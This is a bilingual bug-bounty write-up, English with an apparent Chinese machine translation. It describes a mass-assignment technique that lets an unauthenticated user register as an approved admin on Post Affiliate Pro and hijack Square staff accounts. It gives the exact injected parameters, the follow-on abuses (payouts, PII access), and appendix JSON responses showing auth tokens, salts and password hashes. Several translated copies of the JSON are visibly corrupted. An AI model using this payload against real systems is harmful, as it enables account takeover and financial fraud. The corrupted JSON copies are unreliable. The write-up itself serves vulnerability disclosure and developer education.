Hunter Tip #1 Response To Request Injection (RTRI)
猎人提示 #1 请求注入的响应 (RTRI)

September 02, 2016 2016 年 9 月 2 日

Response To Request Injection (RTRI)
响应请求注入 (RTRI)

Summary 总结

The title to this paper sounds super cool, but it is really not that cool and not that complicated, however it is clearly overlooked by the developers of applications and researchers hunting for their next bounty. After you have finished reading it, it may seem blindingly obvious, but if this was the case, I would not be having the success I do with it as these vulnerabilities should have already been discovered.
这篇论文的标题听起来非常酷，但实际上并没有那么酷，也没有那么复杂，然而，它显然被应用程序开发者和寻找下一个丰厚奖励的研究人员忽视了。看完之后，可能会觉得这显而易见，但如果真是这样，我就不会在这方面取得如此成功，因为这些漏洞应该早已被发现。

These types of attacks have been extremely successful for me over the last two years in Bug Hunting. In fact so successful that, I can easily attribute over $250,000 worth of bounties to this class of Insecure Direct Object Reference (IDOR) attack.
这些类型的攻击在过去两年中对我在漏洞挖掘方面非常成功。实际上，它们成功到我可以轻松归因于这种不安全直接对象引用（IDOR）攻击的奖金超过 250,000 美元。

Examples include, from one program I received two $15,000 awards, from another at total of $18,000 and a partial payment for another of just under $13,000 (still waiting to see what the balance will be on it) and the recent H1-702 event I received an award for $10,000. There are many more examples.
例如，我从一个项目获得了两笔各 15,000 美元的奖项，从另一个项目获得了总计 18,000 美元的奖项，以及一笔不到 13,000 美元的部分付款（仍在等待余额），还有最近的 H1-702 活动我获得了 10,000 美元的奖项。还有很多例子。

I think it is also worth pointing out a couple of quick facts
我认为还值得指出几个快速事实

ALL of these programs have been running for well over a year some nearly three years, and this class of IDOR escaped hundreds of pairs of “hacking eyes” yet I am still finding this class of attack present
所有这些程序已经运行了超过一年，有些近三年，这类 IDOR 在数百双“黑客眼睛”面前逃脱，但我仍然发现这种攻击方式存在

As you can tell by the example bounty payments some of these are large companies
从示例赏金支付可以看出，这些都是大型企业

For this paper, I am going to use an example that I actually found today (well a couple of days ago now) whilst dicking around with a Bug Bounty Program. This vulnerability ended up as a zeroday in an off the shelf product and is classed as an Insecure Direct Object Reference Vulnerability
为了这篇论文，我将使用一个我今天实际发现的例子（其实是几天前）来说明，那个时候我在忙于一个漏洞赏金计划。这个漏洞最终成为了一个现成产品中的零日漏洞，并被归类为不安全的直接对象引用漏洞。

Step (1) – Discovery 步骤（1） – 发现

Whilst looking over the target, there was an option to become an affiliate. I figured I may as well try and register because if accepted it would open up the scope of the target for me. Sure enough, an email dropped in 24 hours later.
在查看目标时，有一个成为加盟商的选项。我想我不妨试着注册，因为如果被接受的话，这将为我打开更多的目标范围。果然，24 小时后收到了一封电子邮件。

Once I was logged into my new affiliate account, I immediately noticed in the top right hand corner
一旦我登录到我的新联盟账户，我立即注意到右上角

Affiliate Software by Post Affiliate Pro
Post Affiliate Pro 的联盟软件

version 5.5.10.7 版本 5.5.10.7

Awesome, thanks for letting me know and saving me some time on google searches. So instead of playing around with the target, I immediately looked to see if I could download the product so I could determine things on a local and therefore more informed basis - “white-box” testing could be a lot more informative than just hammering away at the exposed surface. Unfortunately a download was not available, but the next best thing was, an online demo on the vendor’s site:
太好了，谢谢你告诉我，帮我节省了一些谷歌搜索的时间。所以我没有在目标上继续摸索，而是立刻查看是否可以下载该产品，以便我能在本地进行更深入的了解——“白箱”测试可能比单纯地在表面上尝试要更具信息量。不幸的是，无法下载，但下一个最佳选择是供应商网站上的在线演示：

http://demo.postaffiliatepro.com/affiliates/

The first thing to try was the Merchant Login (wherever possible I always start with the highest privilege account I can, then work backwards)
尝试的第一件事是商家登录（无论在哪里，我总是从我能获取的最高权限账户开始，然后逐步向后推进）

Also, whenever I can, some of the first things I always focus on from an application administrator point of view are:
此外，每当有机会时，从应用管理员的角度出发，我总是首先关注的一些事情是：

adding a low privileged user
添加低权限用户

adding an “admin” user 添加“管理员”用户

As we are logged in as the “admin” account, I created an affiliate account
由于我们以“admin”账号登录，我创建了一个联盟账户

And the POST data for creating the Affiliate account
创建联盟账户的 POST 数据

Examining the POST data, the one thing that catches my eye is
检查 POST 数据时，让我注意到的一个点是

[“rstatus”,”A”] – this is clearly the value for a user being approved. With this class of IDOR however, the RESPONSE is actually more important. We see - ["rtype","A",null,""] so at this point I assume this is setting the account type as “A” for Affiliate (see appendix A-1 for text format)
[“rstatus”,”A”] – 这显然是用户被批准的值。然而，对于这一类的 IDOR，RESPONSE 实际上更为重要。我们看到 - ["rtype","A",null,""]，所以在这一点上，我假设这将账户类型设置为“A”，代表 Affiliate（见附录 A-1 以获取文本格式）。

Now we move on to creating a Merchant (admin) account
现在我们来创建一个商户（管理员）账户

The POST data for creating a Merchant Account
创建商户账户的 POST 数据

What is immediately clear is the [“roleid”,”pap_merc”] self explanatory
显而易见的是，[“roleid”,”pap_merc”] 是自我解释的

When looking at the response, I noticed the following ["rtype","M",null,""] (see Appendix A-2 for text format)
在查看响应时，我注意到以下["rtype","M",null,""]（请参见附录 A-2 以获取文本格式）

This is clearly setting the account type, with “M” being Merchant
这明显是在设置账户类型，其中“M”代表商户

For our final test, we now self-register an account as an unauthenticated user. In the bug bounty target’s scenario, the affiliate registration required manual approval by the target Admin, or in this case the target Merchant Account.
在我们的最终测试中，我们现在以未认证用户身份自助注册一个账户。在漏洞悬赏目标的情况下，联盟注册需要目标管理员手动批准，或者在这种情况下是目标商户账户。

Still using the demo account, I want to see what the POST request looks like and the Response
仍在使用演示账户，我想看看 POST 请求是什么样的以及响应

The self-registration POST data
自注册的 POST 数据

Nothing exactly interesting there, but the response however is somewhat more interesting.
那里没有什么特别有趣的，但回应却稍稍更有趣一些。

["rtype","A",null,""] – it has set us as an Affiliate (obviously)
["rtype","A",null,""] – 这显然将我们设定为一个附属机构

["roleid","pap_aff",null,""] – it has allocated us with the role of Affiliate
["roleid","pap_aff",null,""] – 这给我们分配了联盟的角色

["rstatus","P",null,""] – it has set our account in a Pending state as it requires manual approval by the Merchant (see Appendix A-3 for text format)
["rstatus","P",null,""] – 它已将我们的账户设置为待处理状态，因为需要商家的手动批准（请参见附录 A-3 了解文本格式）

A common mistake I am seeing regularly is the developers are trusting user supplied data on a POST (create) !!! even though it is NEVER expected within a request. So for a quick demo
我经常看到的一个常见错误是开发人员在 POST (创建) 时信任用户提供的数据!!! 即使在请求中从来没有预期过。所以为了一个快速的演示

2) The Attack 攻击

We are going to self-register an account again, but this time adding to our POST data –
我们将再次自注册一个账户，但这次会在我们的 POST 数据中添加内容——

["rtype","M"],["roleid","pap_merc"],["rstatus","A"]

Note: 注意：

at NO time has the parameter “rType” ever been present within a POST request, it is ONLY ever returned in responses. THIS IS EXTEREMLY COMMON IN RTRI attacks. Pay good attention to the responses.
在没有时间里，参数“rType”从未出现在 POST 请求中，它只是在响应中返回的。这在RTRI攻击中是非常常见的。请密切关注响应。

If we send ["roleid","pap_merc"] without the “rtype” value, your account sits in limbo land. You can’t even log into the application because you will have an rtype of Affiliate, yet you have a role of Merchant. The application is a little confused at this point :)
如果我们发送 ["roleid","pap_merc"] 而没有 “rtype” 值，您的账户将处于不确定状态。您甚至无法登录应用程序，因为您的 rtype 是 Affiliate，而您的角色是 Merchant。此时应用程序有点儿困惑 :)

Response - (see Appendix A-4 for text format)
响应 - （请参见附录 A-4 了解文本格式）

Now viewing the Merchants as the Merchant we see our account is added and its status is marked as approved
现在查看商户时，我们看到我们的账户已添加，并且状态标记为已批准

As easy as that :) Clearly at this point we have not managed to create a password, so we use the Forgot Password tool and then reset it and log in.
就这么简单 :) 显然到目前为止我们还没有成功创建密码，所以我们使用“忘记密码”工具，然后重置密码并登录。

So in summary we went from an unauthenticated user to authenticated, bypassed the manual approval process and elevated privileges to Merchant (admin) all in a single request.
所以总的来说，我们从一个未经身份验证的用户转变为经过身份验证，跳过了手动审批流程，并在一个请求中提升了权限到商家（管理员）。

With this particular attack on the target I could
通过这一针对目标的攻击，我可以

View Customer PII and PCI data (limited to Bank Accounts / Swift Codes / PayPal Accounts etc)
查看客户个人身份信息和支付卡信息（仅限银行账户/银行代码/PayPal 账户等）

Set payouts of money to anyone – including myself of course. An example transaction on the site was for $23,500.00
设置向任何人支付款项——包括我自己。当然。网站上的一个示例交易为 23,500.00 美元。

Edit all affiliate accounts
编辑所有附属账户

Edit the entire portal 编辑整个门户

The vulnerability increased my attack surface area which introduced further vulnerabilities – examples found were, downloading of files from the file system, server side request forgery attacks that even returned the raw HTML of the target
该漏洞增加了我的攻击面，这引入了进一步的漏洞——发现的例子包括从文件系统下载文件、服务器端请求伪造攻击，甚至返回了目标的原始 HTML

Ability to install plugins that would further increase my attack surface area hopefully introducing more vulnerabilities that could allow remote code execution.
能够安装插件，从而进一步扩大我的攻击面，希望能够引入更多的漏洞，从而允许远程代码执行。

On so many occasions, I have taken data from the response and literally crafted my own requests with some devastating effects against the application, hence some of the very large bounties that have been awarded.
在许多情况下，我从响应中获取数据，并且实际上构建了我自己的请求，对应用程序产生了毁灭性的影响，因此获得了一些非常丰厚的赏金。

Another common attack, still using the same principle is you will see are batch requests. Yahoo Gemini or Yahoo Mail are classic examples. These batch requests contain other requests within the POST data (99% of the time JSON) for example
另一种常见的攻击，仍然使用相同的原理，你会看到的是 批量请求。雅虎双子座或雅虎邮箱就是经典例子。这些批量请求包含在 POST 数据中（99%的情况下是 JSON）的其他请求，例如

{“method”:”POST”, “url”:”http://www.foobar.com” ,”data”:”mydata”}
{“method”:”POST”, “url”:”http://www.foobar.com” ,”data”:”我的数据”}

In most cases, I see that the POST is always on a create action. For example, create a new user. When updating a user, the batch data will either be PUT or a PATCH but will also contain other unique data relevant to the existing session say for example the userID value.
在大多数情况下，我看到 POST 始终在创建操作上。例如，创建一个新用户。当更新一个用户时，批量数据将是 PUT 或 PATCH，但也会包含与现有会话相关的其他唯一数据，例如用户 ID 值。

So the attack here is to look at the response data on a POST request and note the values returned. Using our example of creating a user, you will likely see a userid and some other really interesting info being returned.
所以这里的攻击是查看 POST 请求的响应数据，并注意返回的值。以创建用户为例，您可能会看到返回的 userid 以及一些其他非常有趣的信息。

Now make the POST request again, passing in some of these values. As mentioned previously, I have seen this on many bug bounty programs. Using the simple example of creating a user account and the userID is returned with the POST request, if I now make the POST request again but this time adding in an arbitrary userid, I literally end up hijacking the account, or a soft delete, meaning we now own that userId but the previous data attached to that userid is now replaced with our own.
现在再次发出 POST 请求，传入这些值中的一些。如前所述，我在许多漏洞赏金项目中见过这种情况。以创建用户帐户的简单示例为例，用户 ID 与 POST 请求一起返回，如果我现在再次发出 POST 请求，但这次添加一个任意的用户 ID，我实际上会劫持该帐户，或进行软删除，这意味着我们现在拥有该用户 ID，但与该用户 ID 关联的以前数据现在被我们自己的数据替换。

If we tried to update the userid using the PUT / PATCH, the application 99% of the time would give a forbidden error message. But, because the application sees a create action (POST), it does not bother to check the data and trusts the data being passed directly to it and simply overwrites the existing entry.
如果我们尝试使用更新用户 ID，使用 PUT / PATCH， 应用程序 99% 的时间会给出禁止错误消息。但由于应用程序看到一个 创建操作（POST），它不会检查数据，而是直接信任传递给它的数据，并简单地覆盖现有条目。

And finally another example is simple POST / PUT requests. I had some great success with this against Square - https://squareup.com/
最后另一个示例是简单的 POST / PUT 请求。我在这方面对 Square 取得了一些成功 - https://squareup.com/

Example: 示例：

POST /appointments/api/staff – Creates a staff member. The response returns the new staff_id
POST /appointments/api/staff – 创建一个员工。响应返回新的 staff_id。

PUT /appointments/api/staff/12345678-1234-1234-1234-123456789012 – Updates a staff member
PUT /appointments/api/staff/12345678-1234-1234-1234-123456789012 – 更新员工信息

Using their own application, when booking an appointment, you chose the member of staff from the company which gave us the staff_id GUID. So for this attack, we would always go after the owner J
使用他们自己的应用程序，在预约时，您选择了来自公司的工作人员，这给了我们 staff_id GUID。因此，对于这一攻击，我们总是针对拥有者 J。

Using the same principle, we made the POST request again, but added into our JSON POST data
使用相同的原理，我们再次进行了 POST 请求，但在我们的 JSON POST 数据中添加了

“id”:”GUID-OF-THE-TARGET”
“id”:”目标的 GUID”

Again, the application was trusting the user supplied data sent on a POST (create). Trying this on a PUT (update), the application responded correctly with a permission error. The end result of this attack allowed a hijack of the owners account and a $3,000.00 bounty.
再次，这个应用程序信任用户提供的在 POST (创建) 上发送的数据。在 PUT (更新) 上尝试这一点时，应用程序正确地回复了权限错误。此次攻击的最终结果导致账户被劫持，并获得了 $3,000.00 的奖励。

I have many examples; some are completely insane literally building up my own POST requests with around 7 additional parameters and values to finally get the attack to work. That particular one took some time but paid $15,000.00
我有很多例子；有些简直疯狂，实际上我自己组装了大约 7 个附加参数及其值的 POST 请求，最终使攻击成功。那个特别的例子花了一些时间，但支付了 15,000.00 美元。

I would love to share more real examples of these and I will seek to get permission on some of them from the various bug bounty programs, but hopefully the above gives you, the developer, and you the bug hunter the general idea.
我很希望分享更多真实的例子，我会寻求从各种漏洞赏金计划中获得一些例子的许可，但希望以上内容能给你，开发者，以及你，漏洞猎人，提供一个大致的想法。

A big thanks to Mack and my brother David for proof reading my effort
非常感谢Mack和我的兄弟David对我的努力进行校对

Appendix – A 附录 – A

(1)

(2)

[{"fields":[["name","value","values","error"],["Id","6e933d74",null,""],["firstname","Hi",null,""],["lastname","Jack",null,""],["username","bar@foo.com",null,""],["rpassword","dAUVTjMIqCm\/CYlPeWkUz6QMCt5oU\/oQ",null,""],["retypepassword","P@ssw0rd!!",null,null],["roleid","pap_merc",null,""],["photo","",null,""],["userid","6e933d74",null,""],["refid","1a5f96f2",null,""],["numberuserid",null,null,""],["rtype","M",null,""],["dateinserted","2016-08-29 13:27:07",null,""],["dateapproved","2016-08-29 13:27:07",null,""],["deleted","N",null,""],["accountuserid","1a5f96f2",null,""],["parentuserid",null,null,""],["minimumpayout","300",null,""],["payoutoptionid",null,null,""],["note",null,null,""],["originalparentuserid",null,null,""],["data1",null,null,""],["data2",null,null,""],["data3",null,null,""],["data4",null,null,""],["data5",null,null,""],["data6","bar@foo.com",null,""],["data7",null,null,""],["data8",null,null,""],["data9",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","fa6ea33b",null,""],["accountid","default1",null,""],["rstatus","A",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["salt","NDkxUoqA8raobBz2pmFNeVHnsbNa25hPJBmDZNe8fpwq16tqs8dH3V5v6TG8YXYI",null,""],["authtoken","366b39065032b9d013bf16ab6f81a8da",null,""],["notificationemail",null,null,""],["ip","71.2.69.51",null,""],["openid_user_id",null,null,""]],"success":"Y","message":"Admin was successfully added"}]
[{"fields":[["name","值","值","错误"],["Id","6e933d74",null,""],["firstname","嗨",null,""],["lastname","杰克",null,""],["username","bar@foo.com",null,""],["rpassword","dAUVTjMIqCm\/CYlPeWkUz6QMCt5oU\/oQ",null,""],["retypepassword","P@ssw0rd!!",null,null],["roleid","pap_merc",null,""],["photo","",null,""],["userid","6e933d74",null,""],["refid","1a5f96f2",null,""],["numberuserid",null,null,""],["rtype","M",null,""],["dateinserted","2016-08-29 13:27:07",null,""],["dateapproved","2016-08-29 13:27:07",null,""],["deleted","N",null,""],["accountuserid","1a5f96f2",null,""],["parentuserid",null,null,""],["minimumpayout","300",null,""],["payoutoptionid",null,null,""],["note",null,null,""],["originalparentuserid",null,null,""],["data1",null,null,""],["data2",null,null,""],["data3",null,null,""],["data4",null,null,""],["data5",null,null,""],["data6","bar@foo.com",null,""],["data7",null,null,""],["data8",null,null,""],["data9",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","fa6ea33b",null,""],["accountid","default1",null,""],["rstatus","A",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["salt","NDkxUoqA8raobBz2pmFNeVHnsbNa25hPJBmDZNe8fpwq16tqs8dH3V5v6TG8YXYI",null,""],["authtoken","366b39065032b9d013bf16ab6f81a8da",null,""],["notificationemail",null,null,""],["ip","71.2.69.{"success":"Y","message":"管理员已成功添加"}

(3)

[{"fields":[["name","value","values","error"],["Id","b4b47799",null,""],["username","xxx@xxx.com",null,""],["firstname","xxx",null,""],["lastname","xxx",null,""],["agreeWithTerms","Y",null,null],["parentuserid","",null,""],["refid","65757",null,""],["data1","http:\/\/www.ggg.com",null,""],["data2","xxx",null,""],["data3","xxx",null,""],["data4","xxx",null,""],["data5","xxx",null,""],["data6","US",null,""],["data7","98444",null,""],["data8","",null,""],["data9","",null,""],["lang",null,null,null],["userid","b4b47799",null,""],["payoutoptionid","8444af30",null,""],["numberuserid","1",null,""],["rtype","A",null,""],["dateinserted","2016-08-29 13:35:55",null,""],["dateapproved",null,null,""],["deleted","N",null,""],["accountuserid","6c2fdb96",null,""],["minimumpayout","300",null,""],["note",null,null,""],["photo",null,null,""],["originalparentuserid",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","a69ad936",null,""],["accountid","default1",null,""],["roleid","pap_aff",null,""],["rstatus","P",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["rpassword","Th0VoPJj",null,""],["salt",null,null,""],["authtoken","e7d289c907b453caa3f28adfdedcfcae",null,""],["notificationemail",null,null,""],["ip","71.2.69.51",null,""],["openid_user_id",null,null,""]],"success":"Y","message":"Affiliate was successfully added"}]
[{"fields":[["name","value","values","error"],["Id","b4b47799",null,""],["username","xxx@xxx.com",null,""],["firstname","xxx",null,""],["lastname","xxx",null,""],["agreeWithTerms","Y",null,null],["parentuserid","",null,""],["refid","65757",null,""],["data1","http:\/\/www.ggg."]}]}com",null,""],["data2","xxx",null,""],["data3","xxx",null,""],["data4","xxx",null,""],["data5","xxx",null,""],["data6","US",null,""],["data7","98444",null,""],["data8","",null,""],["data9","",null,""],["lang",null,null,null],["userid","b4b47799",null,""],["payoutoptionid","8444af30",null,""],["numberuserid","1",null,""],["rtype","A",null,""],["dateinserted","2016-08-29 13:35:55",null,""],["dateapproved",null,null,""],["deleted","N",null,""],["accountuserid","6c2fdb96",null,""],["minimumpayout","300",null,""],["note",null,null,""],["photo",null,null,""],["originalparentuserid",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","a69ad936",null,""],["accountid","default1",null,""],["roleid","pap_aff",null,""],["rstatus","P",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["rpassword","Th0VoPJj",null,""],["salt",null,null,""],["authtoken","e7d289c907b453caa3f28adfdedcfcae",null,""],["notificationemail",null,null,""],["ip","71.2.69.关联者已成功添加

(4)

[{"fields":[["name","value","values","error"],["Id","d59aa0e7",null,""],["username","hijacker@hijack.com",null,""],["firstname","Hax",null,""],["lastname","Or",null,""],["rtype","M",null,""],["roleid","pap_merc",null,""],["rstatus","A",null,""],["agreeWithTerms","Y",null,null],["parentuserid","",null,""],["refid","10101",null,""],["data1","http:\/\/www.hijacked.com",null,""],["data2","xxx",null,""],["data3","xxx",null,""],["data4","xxx",null,""],["data5","xxx",null,""],["data6","US",null,""],["data7","98444",null,""],["data8","",null,""],["data9","",null,""],["lang",null,null,null],["userid","d59aa0e7",null,""],["payoutoptionid","8444af30",null,""],["numberuserid","1",null,""],["dateinserted","2016-08-29 13:42:41",null,""],["dateapproved","2016-08-29 13:42:41",null,""],["deleted","N",null,""],["accountuserid","1072b8a1",null,""],["minimumpayout","300",null,""],["note",null,null,""],["photo",null,null,""],["originalparentuserid",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","532d5465",null,""],["accountid","default1",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["rpassword","ftN3fNlfLABZKrUudxdS1LCqbMbI10gW",null,""],["salt","u3KqtcaNmRtSEWnN44uxT0DrwdPLnLHROrihEs40kyTYuhMymh5ghJHNWwzjigb6",null,""],["authtoken","1499336f6ac1140f9b4d404c7cacb792",null,""],["notificationemail",null,null,""],["ip","71.2.69.51",null,""],["openid_user_id",null,null,""]],"success":"Y","message":"Affiliate was successfully added"}]
[{"fields":[["name","value","values","error"],["Id","d59aa0e7",null,""],["username","hijacker@hijack.com",null,""],["firstname","Hax",null,""],["lastname","Or",null,""],["rtype","M",null,""],["roleid","pap_merc",null,""],["rstatus","A",null,""],["agreeWithTerms","Y",null,null],["parentuserid","",null,""],["refid","10101",null,""],["data1","http:\/\/www.hijacked.com",null,""],["data2","xxx",null,""],["data3","xxx",null,""],["data4","xxx",null,""],["data5","xxx",null,""],["data6","美国",null,""],["data7","98444",null,""],["data8","",null,""],["data9","",null,""],["lang",null,null,null],["userid","d59aa0e7",null,""],["payoutoptionid","8444af30",null,""],["numberuserid","1",null,""],["dateinserted","2016-08-29 13:42:41",null,""],["dateapproved","2016-08-29 13:42:41",null,""],["deleted","N",null,""],["accountuserid","1072b8a1",null,""],["minimumpayout","300",null,""],["note",null,null,""],["photo",null,null,""],["originalparentuserid",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","532d5465",null,""],["accountid","default1",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["rpassword","ftN3fNlfLABZKrUudxdS1LCqbMbI10gW",null,""],["salt","u3KqtcaNmRtSEWnN44uxT0DrwdPLnLHROrihEs40kyTYuhMymh5ghJHNWwzjigb6",null,""],["authtoken","1499336f6ac1140f9b4d404c7cacb792",null,""],["notificationemail",null,null,""],["ip","71.2.69."成功":"Y","信息":"成功添加了关联"}]

Latest Blog & News最新博客 & 新闻

Hunter Tip #1 Response To Request Injection (RTRI)猎人提示 #1 请求注入的响应 (RTRI)

Response To Request Injection (RTRI)响应请求注入 (RTRI)

Summary 总结

Step (1) – Discovery 步骤（1） – 发现

2) The Attack 攻击

Latest Blog & News
最新博客 & 新闻

Hunter Tip #1 Response To Request Injection (RTRI)
猎人提示 #1 请求注入的响应 (RTRI)

Response To Request Injection (RTRI)
响应请求注入 (RTRI)